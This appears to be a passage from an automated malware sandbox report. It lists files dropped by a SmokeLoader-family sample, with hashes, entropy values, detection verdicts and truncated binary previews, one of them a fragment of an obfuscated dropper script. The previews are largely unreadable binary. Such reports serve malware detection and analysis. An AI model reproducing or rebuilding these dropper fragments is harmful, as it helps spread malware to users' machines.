              C:\Users\user\AppData\Local\Temp\Armeniafile.exeGet hashmaliciousSmokeLoaderBrowse
                C:\Users\user\AppData\Local\Temp\78801\Later.piffile.exeGet hashmaliciousSmokeLoaderBrowse
                  file.exeGet hashmaliciousSmokeLoaderBrowse
                    UnDqKnghuz.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                      Pi6fnXmVmd.exeGet hashmaliciousSmokeLoaderBrowse
                        file.exeGet hashmaliciousSmokeLoaderBrowse
                          mg9LPWGtPB.exeGet hashmaliciousRemcos, VidarBrowse
                            file.exeGet hashmaliciousSmokeLoaderBrowse
                              fvI01ZBE1b.exeGet hashmaliciousSmokeLoaderBrowse
                                II0MvEwlPf.exeGet hashmaliciousSmokeLoaderBrowse
                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                    C:\Users\user\AppData\Local\Temp\9CFE.exefile.exeGet hashmaliciousSmokeLoaderBrowse
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1484688
                                      Entropy (8bit):7.9998734363149655
                                      Encrypted:true
                                      SSDEEP:24576:q8Ued4h4zM+XdfMvK1D7tkKkB/ceoXq1TaFNRU3zSUczyumTmRnGCXkxV5DZA:qFCo4I2fz1XqKQ/ceyq1TKNRU++HT8n1
                                      MD5:9A55C4EDDCB8E0B33890C37A305FE742
                                      SHA1:BABC862D0641FDE20B4B1A61BAC0D87A884A6B17
                                      SHA-256:2F496B7A2EAD4A49D5C005EA27FDB6217914DBF5A0A4A9D991C590B4D47B1867
                                      SHA-512:A7E55A8831CDA861CF43AC62CFC79822DF55AF04E20492060F6E258F227A46C485764C4157C5DE9ABE2F74EE93C0149C1C0DD8F16ECDCED5CBB4998AC88EA569
                                      Malicious:false
                                      Preview:....z....P...Gx.XT`.. .....,..5u.^.=...8$....:...x..9.O......sl*..v....H.....).....k{+<0..e.....*..d..p..A^.3..Bz.e..`KE....D.JJ.1.A.l..w.........L)"..~..W...ZA.......vl..@....I...c'V.!. .i.0..!......<..g..^...\y.2.O._.i&....M.U...z(.'{.nr$..... .... .6./.:.a......Q..].<....}..t2.C....$.qW..C......H.k.3..h.^..{.V.`...d..}........ klv.b\F..=.M>5...n...r.W_.....D.Z_B...Q..b./....6O8..Z....QC...a.....pI..._/..K.....f..g=.{...Y....-...4....o...t....)o..~3...Y..a&.q....~.M>..p.u+g.....%o.`......%...A./t".........UA..~{.,...dI...WI...-|J...~.5..b.#..X..*\..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...O.M.'.F...h.................1.......1...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K...
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):937776
                                      Entropy (8bit):6.777413141364669
                                      Encrypted:false
                                      SSDEEP:12288:FJV3REMvnCG22lhtjVoAYxQl+u13a/sVyaVeK56ORMkkOlPlNKlga4Umff2lRO:F3hEW3hlVodGl+gUKrMkzXa4P6RO
                                      MD5:B06E67F9767E5023892D9698703AD098
                                      SHA1:ACC07666F4C1D4461D3E1C263CF6A194A8DD1544
                                      SHA-256:8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
                                      SHA-512:7972C78ACEBDD86C57D879C12CB407120155A24A52FDA23DDB7D9E181DD59DAC1EB74F327817ADBC364D37C8DC704F8236F3539B4D3EE5A022814924A1616943
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: file.exe, Detection: malicious, Browse
                                      • Filename: file.exe, Detection: malicious, Browse
                                      • Filename: UnDqKnghuz.exe, Detection: malicious, Browse
                                      • Filename: Pi6fnXmVmd.exe, Detection: malicious, Browse
                                      • Filename: file.exe, Detection: malicious, Browse
                                      • Filename: mg9LPWGtPB.exe, Detection: malicious, Browse
                                      • Filename: file.exe, Detection: malicious, Browse
                                      • Filename: fvI01ZBE1b.exe, Detection: malicious, Browse
                                      • Filename: II0MvEwlPf.exe, Detection: malicious, Browse
                                      • Filename: file.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...y..U..........".................*.............@.................................w.....@...@.......@.....................L...|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\explorer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):2074333
                                      Entropy (8bit):7.989792233892196
                                      Encrypted:false
                                      SSDEEP:24576:WI/0CggJRaGdnyEc2ZAuTvjL84btYvmiOZFFgFzis0YS06IXPkUMonnDN2Mh6VqX:XXRrRtquTjtg1FWj06IXsGnDN2/S
                                      MD5:C71D322F4A1D526CC0E5B3E010C184BE
                                      SHA1:0E7BD9B2E6EA0F95A87422A3010BA71D3B3E1E0B
                                      SHA-256:AC46787D7511520D8DD14CB5A094141F338CC50B3C7B8CB31E3F136F5AD871BA
                                      SHA-512:6EE9DAB4724001EF1F51600A4672DDC45CC6924448C88A1AF7F50AB6D0B83DCD5A12A265C742D54B02C3B6C9D81F923474EBAE41D371A5BE9F7E8B40B18A89FC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 11%
                                      Joe Sandbox View:
                                      • Filename: file.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@.......................................@.................................4........@...c..........uy..h-......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....c...@...d..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):18432
                                      Entropy (8bit):6.460926311784452
                                      Encrypted:false
                                      SSDEEP:384:jfDltc/M2fJAXzzgO1X2gEF2daMAE36bbmrWNUfKKPQY5hZVZ:jb3jsJhQlEF2VVay1N5JZ
                                      MD5:2E7BF8BA169A13711D7BB4E6129E27DD
                                      SHA1:FC23B540478CDA627185DFA5195E4FCA9BC4821E
                                      SHA-256:84FB11670E7994E9CF02CA7BEFEB67A5D21D0A8A2D8F0EB361DF428E130E7690
                                      SHA-512:637BE1E308B8EA73C660CDE18256A9087572147185C65A01D1B2963DFF1DD43BC8C22B3A53864E4AB1B8243B2D48FDBB619C4EEF5B03CB60D0928299B6BAD8D8
                                      Malicious:false
                                      Preview:R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...y..U..........".................*.............@.................................w.....@...@.......@.....................L...|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B.........................................................................................................................................................................................................................................................................................................DQL......h..C.....Y...L..h.C..{...Y..N..h.C..j...Y.h.C..^...Y..<C..h.C..M...Y.....h.C..<...Y.Q.>...h.C
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:DOS executable (COM)
                                      Category:dropped
                                      Size (bytes):6144
                                      Entropy (8bit):6.456264163237685
                                      Encrypted:false
                                      SSDEEP:96:cQykl+rRStNt/couZicovav+z2dZwh/VYp3Lr3wjAxUWIea53mZZVLdg:xykIRSrVF+r+z2duhKv3wl3hRsZrg
                                      MD5:509254CCB8073BDF73AA07A923868E41
                                      SHA1:D9C86D822C95036794BC336DD9EF757F5F228A1B
                                      SHA-256:A18537B767336C9FD3265E9919034505CA376D43BD291629E0B245D66B71A2F9
                                      SHA-512:5FC91577F80AC71F5A428FC0E16240E27430832E161DEB53F2A49CD198857D30DD8DB71048F182D1BC1F2F7DA2FE60A212739B1A504CB15EB28272FC2435B669
                                      Malicious:true
                                      Joe Sandbox View:
                                      • Filename: file.exe, Detection: malicious, Browse
                                      Preview:..3..M..,..._..^[..]...U......8.E.VW.}.3..@..D$ ..I..t$$...t$(.t$,.L$........@..D$..dtL..T$...u9....L$0h.-I..dtL..7......rL..0...R..L$0.htL.....L$..T$.;.htL.u..u.W.u...S..........p...R..D$.......L$..@ .D$..D$..t$.PW.u..D$0P.u..:....xa.t$..L$.......L$.;H.|1.t$..L$.......L$.;H....u..L$..D$$P.t$.......y....}..u..t$..L$.jp.&5...........L$ ....._..^..]...U..Q.}..SVW..........\......E.t..u.......u....ON...}..t...rL...............;.r..E......._^[..]...U....S.].V...W.u..X...3.3.@.C.....WW.H.........WW.H....K....u...p.........U..}.S.u..p.......E.....M....U._^[..]...U..V.u..q....<......_...........M.^.H.]...U..V.u..q.........H .4..........^.@0.]...U..V.q........U...P......M.^.H.]...U..VW.}...f.G.f.F.f.G.f.F........t0j......Y..t........H..J..H..J..@..B.....3...&..F.f...u......G..F...f.. u..........._..^]..........t.....t.Q. ....V.......V...Y..^.....A.f..At!f..Rt.f..St.f..Tt.f..Ut.f..Vt.3..3.@.V..N .....N.....V.Z...Y..^...U..VW.u...gL.......hL.j.....0..(.I..~L...t..~LW.u...@
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):166912
                                      Entropy (8bit):7.99882170763392
                                      Encrypted:true
                                      SSDEEP:3072:OjjwS845AbyZ/lENvWkMd/pZDwhAX8Hb5qcvfXZKUjryBuYjP5JX65M+dFrJey5K:Ovecoyke7Mdqm/ZPjsjP3CnX1eXN
                                      MD5:1B872A2F5EDF33A42EA262FF9512C38A
                                      SHA1:B8431E1C013AF53A738F00AFC8C9EC04D850E0EF
                                      SHA-256:D39E970142BF811FD1718BF43849AC28093FB454AA577DB102E764C99A948924
                                      SHA-512:DCAD1A738817CB46399341E420D3E5C1EE015D4843090A2CF8FA715C3BFE5E68B13C600DCF98329CE37F9D7292929CDF69833DC47E90066FB9D049B97A910EEA
                                      Malicious:false
                                      Preview:..,..YXP.@...q..H...@.. V..(..#....:..A..yb..Q..s..W...t.K......F..F....Ole.7t..21I...Z{.{..O.n.....([`.].3.3......`c..j.g......=9^)c.`..[G.a{....t`.$.Ec.gA.,...\.^5_...>.,K...u..!.`.\.8%C........!oS.<....RBT1/.....s!......H......0.*5E.....L:..h[l..R\..d....9.d....e%..X..J....TV...>....../K..;..>.[...*.v.wG.6...8PMd.....3..C..@.....>)v.fN..F.P&....".&w[.~.c.aO.d+.ZW..A..ib?H]{c..t......d.-9.c.R...r.C.[I..q..:...)Wb....o.pX..#.......S=p...C.R^....+..sC.I......!.....w.#......].......E.....`.]!..(....m.K<..c......&%...Q...]...hZ.v.>+.&..d.....Q8.a.l.*....a...kB.c.d=.z....?j.Q;xMw..y....Y....@.2...........M>'..q....g].m3...6/>...!.F.F.......g...(.1.q...7!...n.w.L....jk._.[.....gJ...y.r~[4.7.b.S....u9.Q.s.&...U+..v...G.?l....t......7..-.n.#=.}&.(Y...Q...'s.T5...5.}r......|........-9..0|.&.1.O....u...Y..gj0....>7.fW..}..2QT.X.?;5..<B.f.K..*gy......r:.....d...........#171......1..r.}.b.....^.)../|.+I.o.5..e..ae&.a.9.........l..&s".#.B..f.
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):10240
                                      Entropy (8bit):6.330192748303443
                                      Encrypted:false
                                      SSDEEP:192:qNOmBH6yAFafjL5dsVckFNiUbRMRbVIdGZ2zdkaUdGFdyLYAlue4WEAT+1qrIBRE:qbAYjL52ykPAOzUoFdyLYAgeWp1qMBj6
                                      MD5:7F4A952F635AEAA68808133DA67F7176
                                      SHA1:E29E003779037DAF86E65D9A314EA2C95D738659
                                      SHA-256:AD6D84C17DEDBA0B15173AD31FDFF8B5D87C543D95F3047A8A0764261B22B568
                                      SHA-512:05D70FDBA6B25696B28FBA3117FBD45B706367F8E17287B080E13B23659268D04C70AD966138464AFA0853D22D60F3FDA09F9B55E8D3FEC8BC12EB4CE14273D2
                                      Malicious:false
                                      Preview:..........E..E..E.....PWhK....u.......#E...3.WWh....V....I...3._^[..]...U.....E...gL.P.E.P.u.......u.3..q.M..$hL.V3.........E.+.tCHt8HuO.E.P.u..u.Q....I..U....M.E...U..M...U .M....M$.....u(.u....u..u..u.Q....I.....^..].$.U..QQ.E...gL.P.E.P.u..N.....u.3..=.$hL.V.u.............t.3..!.u...$.....$hL.......E.......3.@^..]...U..QQV.E...gL.P.E.P.u.......t1.M..$hL.............u..E...pP.,...j..u..$-.......3..M.......^..]...U.....E...gL.SVWP.E.P.u......u.3.......M...hL.....M....E..$hL.....M..8.......7.u..]..q.....H.|..wH........]..................tx~.............tH...t-...u..E.....z...j.P.GH...j.j..w4..X.I..'....}....S....u.j.h.......}....=....u.j.h. ..V....I.......E...............E..........j.P.GH.L......... .......5..I.j..7..j..7...7....I........tN.....A......t3...t..........~#............j.V..\.I....Pj.V....I.j.S._H.....@.]......u........;.u.j.P.GH....)Sj.h....V.5..I...Sj.h&....u...j.W.u..*...=.bL..t..}..u......3.@_^[..]...U.....E...gL.SVWP.E.P.u..v.....u.3.......M...hL..
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):40960
                                      Entropy (8bit):7.995936566712064
                                      Encrypted:true
                                      SSDEEP:768:zQZ8kGkekWz/3C15xVskqVuPne3OHrg4vMR1wJC2KlnqeLOd8oiWv/d:zzkHWz/3k5xV7qOne3O+oCP/ydp/d
                                      MD5:648B696C2822027584DD86A38F16AFF8
                                      SHA1:007F405425DAEABF048D3097F62949FAFB669B84
                                      SHA-256:35D43447C909E7158C01AA2E2889B9FC4938A119E615AEA51535CD0F9C0E906F
                                      SHA-512:3BFC2678CFE73D043DA28923FBFCA8D1F7C19BDFCFDF956B49B18463A6D15AD00472FC3FE10664E6A6B85C770702D16FF05450EA6E204210BDD1515FD0C6400A
                                      Malicious:false
                                      Preview:.6.^...H...d.Q...._n.C........{...!}..").5.q.".......xOB.....&..!i.....QS..jw........{.V.1.% ._2Y..P......Z......,|..E...AJ...V.r...n..h7..&J".R..p)...ycH.=.`........4..Fa.....]&=.G.].8....%.i.x.'.....H..Ce....4. .i.z.=...B$.....@..,8./...^.#.l..f.JXq~..{..f.R V.:..(......5d......C.#;..R.et.....U?......NG-c.Se.S4#.kRz.V.3......?g..i..:..h.n.......... ]@( /..5.[f.......8.[.......X..q..0n......`z.../;.@S..^..:.~...J...c.Qa4...>.;..Q......h.z9..L/....q79W`&..WF.]...9z.._-...d..#.x.w..l..n...[.......S|..' .....:!~.w...NU..2f..a.=..'u.y..mH.Y).....}.&..6c.P[.<._..p.dee...9...).1....'EUS2.7|.l....p2..U*L'.h.d...-...?.qK.62.X..k....7.........{.=.F.f.j......._.Z.aa.R..}..>@.........-I....b3...8......-..C...a.]+.......F.P@...T...2.U..2..6./f.#.?D..4.W..>....F.K-....Eyb...OS.S..x?..+.H.j....4.)...'~..Q..E...h...%...W#u..e.C.<&..;.bSy..8..jK...,(.5Rr...6.......vOH.......f.#.P.k...[....._L..5......f.3]..H....Mv.k..#.DR...l../.=+./?_'&H7._.q..
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:ASCII text, with very long lines (913), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):7821
                                      Entropy (8bit):4.993667118646189
                                      Encrypted:false
                                      SSDEEP:192:3VX1zl1rDqdXRbrTO7KhiaidY8br1l4yGMUM4Xh3BuxXD:3V1zllqdXFHiKkdJb5a6cruxXD
                                      MD5:8873CB2427E113519FEF07581B3B24FB
                                      SHA1:60ABCE8C19B4D6DE428CC07873A2A9B1EAD6AAF9
                                      SHA-256:E72B7AA3586090E06F6013A1758A2D848F4BEE648080F9844E8421BBFB8E0F37
                                      SHA-512:EE218BD508AC722E7790EF2C003D99ADAB7A2E4190722AF838ADE64AF4956E4079E462C81D368CB9BA671ADACFBBEAC881CC575DDAB8D1B3FA6FD2298FEEB82E
                                      Malicious:false
                                      Preview:Set Pregnancy=F..DPhPParcel Vessel Zambia Standards Coordinate ..pHYPoor Lips Permalink Glenn E ..AyuSWebmasters Gift Caution ..iAConsole Fragrances Employ Slope Holy Trip Based Columbia Savings ..grcbSpotlight Illegal Options ..fBpPound ..XiMinor Strong Out Azerbaijan Tracked Constitutional Individually ..lStEnvironmental Borders Uniform Mention Spencer Assignment Ima ..KCKECorpus Ins Advice Encourages Obtained Poll Iso Rwanda ..Set Headed=g..dlikPicks Out Msie Lover Okay Yearly Homepage Dennis Leasing ..tAhXChecklist ..gKHu Endorsed Neighborhood Combining Opponents Vid These ..qjHCuts Technological Apparatus Toxic Bryan Aspnet Clay Cover Alt ..PNEXInfluenced Moving Rt Doors Tough ..nDaHappiness ..IyWjConventions Collar Economy ..VywBumper Kay Pure Personally Leeds Socket Nails Pirates Increasingly ..Set Incentives=L..YLResponding Exclusively Post Ta Purple ..AuMan ..DcIMail Iron ..gPXNStress Copper Sims Delaware Creations Peripherals Acts Aaron Eminem ..KBrDeclaration Expect Spaces .
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:ASCII text, with very long lines (913), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):7821
                                      Entropy (8bit):4.993667118646189
                                      Encrypted:false
                                      SSDEEP:192:3VX1zl1rDqdXRbrTO7KhiaidY8br1l4yGMUM4Xh3BuxXD:3V1zllqdXFHiKkdJb5a6cruxXD
                                      MD5:8873CB2427E113519FEF07581B3B24FB
                                      SHA1:60ABCE8C19B4D6DE428CC07873A2A9B1EAD6AAF9
                                      SHA-256:E72B7AA3586090E06F6013A1758A2D848F4BEE648080F9844E8421BBFB8E0F37
                                      SHA-512:EE218BD508AC722E7790EF2C003D99ADAB7A2E4190722AF838ADE64AF4956E4079E462C81D368CB9BA671ADACFBBEAC881CC575DDAB8D1B3FA6FD2298FEEB82E
                                      Malicious:false
                                      Preview:Set Pregnancy=F..DPhPParcel Vessel Zambia Standards Coordinate ..pHYPoor Lips Permalink Glenn E ..AyuSWebmasters Gift Caution ..iAConsole Fragrances Employ Slope Holy Trip Based Columbia Savings ..grcbSpotlight Illegal Options ..fBpPound ..XiMinor Strong Out Azerbaijan Tracked Constitutional Individually ..lStEnvironmental Borders Uniform Mention Spencer Assignment Ima ..KCKECorpus Ins Advice Encourages Obtained Poll Iso Rwanda ..Set Headed=g..dlikPicks Out Msie Lover Okay Yearly Homepage Dennis Leasing ..tAhXChecklist ..gKHu Endorsed Neighborhood Combining Opponents Vid These ..qjHCuts Technological Apparatus Toxic Bryan Aspnet Clay Cover Alt ..PNEXInfluenced Moving Rt Doors Tough ..nDaHappiness ..IyWjConventions Collar Economy ..VywBumper Kay Pure Personally Leeds Socket Nails Pirates Increasingly ..Set Incentives=L..YLResponding Exclusively Post Ta Purple ..AuMan ..DcIMail Iron ..gPXNStress Copper Sims Delaware Creations Peripherals Acts Aaron Eminem ..KBrDeclaration Expect Spaces .
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):105472
                                      Entropy (8bit):7.998362329910895
                                      Encrypted:true
                                      SSDEEP:3072:tBpcQrRvo2a1uSUcIbkGgXdehpttz6eXBDAfwdf:tEYRA29syb
                                      MD5:D663A82475283C2ECF7D421D1FFB8314
                                      SHA1:557386DF40B653DC5242927D891B8E1DCC96845F
                                      SHA-256:1CA55B98B00C0416C8E86466140C8B7D1546B238DC630FFA26C519DE034658DD
                                      SHA-512:7823F30D979085282156AE6D36969036BD1FD4D2431C3B4793A8BAC366D739834D4D18DDB0AC3351073E876177EEDBB057EFCB65A163BFAA0F485D174B112D9C
                                      Malicious:false
                                      Preview:.&..?^<.H....-)S=.8d....;........K.<..u.;B..c.q.q....4l,.3P.....+S.!...AM.x.C.......7....F.%.....m..pNtC.......B.i...j8.{...7.r.Q..0;...........:^..|=.D...:......z........w..u'`..".......f.1nP...x...=..f-+{`.Jz].v.I#..d6^5.Z:...].D.8.!o|-jBH...x.y..+&......G.WvJ.(.T@.1...W............ty.w.%.]...<.&k...4.U2.X.8@.N.8..;7V.;..z.^.jY>..^\..4..u .Zz2......9,D..........g....)8..E8='.......P...d.,t..v.B- ^>.nZ9.!U........*..!.>..1r.\..0.j...o.4;....W....+.9...vHx.C.....T....)G.v...c.....e4Ai..Z.n~......K|[os.bf|$.[.S;|.&E...c....#.t......V...j.<_.G.RQ.l./.X5....Dv.....\...&....0B...x8(...q..RneH.@J../>..@K..|B..".............><1..{..Z...OKeM..Zd....N&...c.f.....;=..G.PV0.`.9m[\......e.H@S3.rj....n.{..._..wu6.B0+X.q.....M.x*"..h.i..A......`...^.|. .&..{.p..r..x<.R._..r..]....Fg.....mW.....F..........S../..2W1...'.9h.....{......9.#.G..5......._..|\....#a...1...3w.|.(..6...%{.Nl.t2..3+a...h..0.%..*...h..G...>.N.&..*.)..8..:.PZe!n..5........
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):31744
                                      Entropy (8bit):6.449430045275753
                                      Encrypted:false
                                      SSDEEP:768:BSoO6Qku2ox3hOk3Hsu1izubGntN6IZOjAV0SMg4XJx:BjOTJh1Xl2ub2tBOjAeKmz
                                      MD5:BDB9BA9BCF6CB866C1A12C5C316916BE
                                      SHA1:9FCEA43A0FE361A3D57D45D333E5473C0D7E968E
                                      SHA-256:8A96D26D658297830BA07A2775EBD9BAD2942D8F7C2AE42480DFE7A79E95F1E2
                                      SHA-512:135DEE919184C6CC7C38561068BFD0BC2CE71BCC1CE2B175CF29C8E40EBA814E4D731A5C2437F7422DD817FEAE2954933603EA60182399212CABF8F8AE43BD84
                                      Malicious:false
                                      Preview:.........@.....v....t$p.u..L$.PV.u....)......I....U..E...;.tS.r..t$@.....B.f...t?...3........Ot0.....o.....Xw"....k@..$.|k@........>.....'..5.........t$..L$Q.T$,..........k.....0@`J...........|$ ........D$$3..D$..|$...........t..I..r.R...........u.._^..]....t$ .D$................tL.t>......0....w.....7....G..........h.tL....G............~....t$ .D$.F.t$ .....u....|$p.=.rL...E....E..@.......D$........=.rL....2....5.rL..>.........@tL..D$....... .....`tL.......\tL......D$<DtL..D$\DtL....@..T$0.D$8.J.................;.r#.....D$.....t.f..f;.u%......Ou.3....D$....8..t.f..f;............@..xg..g....D$8.T$0.J.....Y....Q.;........D$..T$4.8...D$T..t f..f;..D$T.............L$4.D$Tu.;T$8...........D$8.T$0.J..........Q.;........|$....D$T.?........f..f;.......s..T$0.A..B....A....y.........L$<...A..>.|$<.G....D$.....f..f;.s..T$0.A..B....A....y....p....L$\...A..>.|$\.G....D$..x......w:.$.Dl@.....9...j...................1.D$,.A....D$,.D$L.D$H...................u..|$..D$$.}..D$..Y....t$ .D$........
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):34816
                                      Entropy (8bit):6.544140741251838
                                      Encrypted:false
                                      SSDEEP:768:4Grkx3zN3AFR97T98+sDkXLAlMoLVNIo8DJWxWWbP7J:HYNB3OFTR7bAlHL/4ajJ
                                      MD5:8C5DDE9D7A99299C9BDDFE29839FC261
                                      SHA1:6C3C02DA434BE0125A763C7001E4DA6E2F05A86B
                                      SHA-256:DAD453ADFDD2284F3703E1A708FF7ABAF8D72AE34FD9D47A22DB3654220D09B2
                                      SHA-512:3AD64CADAF94CB01B280437F4EE4A84EFF32FC9792A924866CF8F960D1DE510CA5F159ACA73661B15CC16E3A3953C4C22FC69684DB44BC41B2DA73340F07656D
                                      Malicious:false
                                      Preview:.D$T9s..."...Q.D$0PV.L$l.+...........D$0.L$....0.@..D$...+.PQS.L$(.1...L$...L$...V..0..j%Yf9.u..F...P..0..j%Yf9.../...V....0..j\Yf9....p...D$.;D$T.......t$.@.L$HVS.D$..+/...D$H.L$DHP..0.......i...p.....p....Et...Gt...X...p....d...p........w$.E..L$..@......j..QQ..$.t$LW.]R.....W.L$ .V3...t$.;s.......;s.|z.M..D$.P.si...L$,..#...L$`..+...L$`..6...L$D..6...D$@..u.P.)..Y.t$<.)..Y.D$\..u.P.x)..YW.q)..Y.L$..6.._^3.[..]...Q.o..j.VS.L$(.=0...t...U....S.].VW.C..0....f...F.....p..C..H..i...X..E..x..v..@..H..i.....M..r+..;..K..xG..xG..+.;..?.E..@..0....f..WS.v..M..-...M..E.P.kh...M...5.._^3.[..].......+....U.........SV.L$..L$`W.)...}..G..0....f...G..^..p.....f...N......3..L$......D$.r&.G..H...h......................L$..D$........o...........QHQ.L$l.D$..).........o..S.L$h.J*......3o...L$,.V*.......ho.......'p.......eq...\$83..D$...I..|$ .D$$.D$<.D$(.T$...$........$.......L$x.........|$t................;.........$......$......$......$....PR..$....V.t$x.I........$........k.....$....
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):25600
                                      Entropy (8bit):6.64627475212565
                                      Encrypted:false
                                      SSDEEP:768:otlgwYtfKUGabl8UvrcyzJsDXtiC84Ll9iR5:ogXKUvl8UTcyzJW784LlC
                                      MD5:F827FD00C51C76A5512BACED44571AE2
                                      SHA1:A785CA6A37BEC446E397EE2EA23F914E3423EB53
                                      SHA-256:4BDDE8A5F7819F7EEF75CEC291379D2F4B7035D5EC8412EC1D2F003363D65A6C
                                      SHA-512:FC9331B864386333D709A8468E692153FEB38A67DBFC78868BE2B42DDD53C5FC9B07FF6709E6BCD7B5E92657AADBE1BFC066A60A32E8CB6D2A463EEA1897BD46
                                      Malicious:false
                                      Preview:;..rL.....~.I..~..@.Iu..@......]...U..M.;..rL.}...x...rL..4..M...........M......2.]...U.....U.SVWj ^j.3.M._..}....Bf;.t.f;.u.@....4Bj"Yf;.t.j'Yf;.u..E......<......j>Y.]..u.@.]...<Bf;.t.f..t.f.<^C@..<Bf;.u.].3.f9.B......j _@...Bf;.t.f;M.t....Bf..t...;.......E.3.Vf..F..,..V.:-...M..]....}...E..x@t9....=....ujOxg.]..C<.M..4......V.M.."....M..=....u6Oy..<..~8.@<.M..4.....V.M.......M..=....u..E.C;.|....u.V..,..YY.M.........2._^[..]...V...N..V..F......t.Q.zm...N..F.^.$...U..SV..j.[.F.9F.uM...j.X;.r...3.F...W.......Q.|....~....Yt..F...t....P.v.W......v..........~._S.J.....Y..t..M.......3.N..F.....F.^[]...3.3..Q.f.Q..A.........f.Q..Q..U..U.;.t".....B..A..B..A..B..A..B..A..B..A...]...3.9A t.j.X9.}.P...1.U....3.9A t.j.X9A.}.P...q..:....U.......3.V.u.W....f.F.9G ............P....I.....R........8E.t.8.....u.....u....8E.u.....u..F..8.....u.....u..F..8.....u.....u..F..8.[....................F.......Sh........I.....I......f..u.h..........f..t.....u....h........I......f..u.h..........f.
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):10240
                                      Entropy (8bit):6.700900504319774
                                      Encrypted:false
                                      SSDEEP:192:XucgyTMPtcETjr3D80GMKTY89cKyjB+mOofFsBk2yRU:XucLgTjr3D8kcHyjJFsBNyC
                                      MD5:5D78343086C06DA71F968CD0BA108503
                                      SHA1:A5132BE3DB551DF3447278375BA53D3B512B6F67
                                      SHA-256:A99B266ABF253391A0F0B4ABCF454A7E6AD74FF653619EF682CF9ABCFD9FDB01
                                      SHA-512:1FB6A201D2BD6FB5668ECAD6FB13D45EA366F87F3FF38C2CC0012270DCB1BD593DEA31D9809F2E1004EEC2F0DD6F1B12D4002F9C2725DF44F83D87195F370C2C
                                      Malicious:false
                                      Preview:.W.\...Eloocdd..X..PH....$.f'.k.c.|~...02..P....z.E/...../.....b{{........f..R...t:?....sss..7n..,,4......^...J..Rye.@.....<g..4m.......wvvb.\n.T*.r8..gffFK.....`..011!&...f<.TS.N.......zz@DJ..i.0.>.=.o..^y.r..T*.T*.x.WS0....b..p...............r..tJ3...}].~.L...........)...$......666l....&..\.w.V.].X,..Db.^.#.J..j!..cll.n.[\.+.!..1..r....u.?..;...Ni..;..7..m..y...R.`zz.###H.R'.ry.n...B......+++.k.5........_......AT...[.\.@p.........rS.ju. .......EY..T.X.....z...l"..9.R.C.....*.e.x^.h\........h ..aoo.V......x<...>j6...v.z(....I/--.....}...]i.....k...k...P.. ..9 x..oggg,...k.Z...[.`p:..y......`6.1>>......nq...(.e3...*...\{......n.B:n..I.XD:.F.P@$.A4....y+..y...t:.B.......7n.Jf|5.^/..Z*. .......>G.J....u....H:.....f....x..x<(T...rb7.`0(61....e.v.....j..F.......j.\.#.. ....p`bb.^.............v....p..+.......BK...M|..^5.......1....90..........C.T*vzz.k6.3...j0....B.f..l6.b....H$"...Jj...=aE.oR.W;G.$.A........d.P84......6...h.~...F...f......f..x<..
